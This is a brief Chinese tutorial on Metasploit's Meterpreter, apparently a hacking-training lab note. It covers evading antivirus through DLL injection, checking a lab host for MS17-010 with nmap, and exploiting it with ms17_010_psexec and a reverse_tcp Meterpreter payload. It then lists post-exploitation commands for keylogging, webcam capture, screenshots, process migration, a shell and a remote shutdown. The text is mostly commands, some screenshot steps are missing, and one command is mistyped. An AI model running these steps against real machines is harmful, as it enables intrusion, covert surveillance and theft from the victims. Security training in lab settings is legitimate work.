meterpreter简介
meterpreter的隐藏性特性可以使其躲开众多杀毒软禁啊以及基于主机入侵检测系统的检测。通过DLL注入方式,meterpreter可以附加到不同的进程上,它可以在这些进程之间进行切换。
基础使用
我们获取到的shell只是基础的情报收集。
有时候会限制我们的操作。
目标电脑

使用nmap进行ms17-010的漏洞判断
nmap --script=smb-vuln-ms17-010 192.168.30.133

使用msf

使用辅助模块

设置参数

结果
搜索ms17_010的漏洞利用

use exploit/windows/smb/ms17_010_psexec
查看参数
show options

执行
exploit
exploit模块选择错误,(系统是32位)
只能重新选择了

get到shell,使用payload是
payload windows/x64/meterpreter/reverse_tcp

获得目标shell

meterpreter功能使用
获取系统ID及计算机名称
getuid
获取当前进程
ps
打开记事本

终止进程
kill <PID>


获取当前进程标识符
getpid

获取当前meterpreter桌面
getdesktop
开启键盘记录
keyscan_start
终止键盘记录
keyscan_stop
转存从主机捕获的按键记录
keysscan_dump捕获摄像头命令
webcam_snap
获取主机shell
shell
截取屏幕
screenshot


迁移进程
migrate <PID>

查看帮助信息
help或者?

shutdown -s -t 15 -c "this is hacking training"









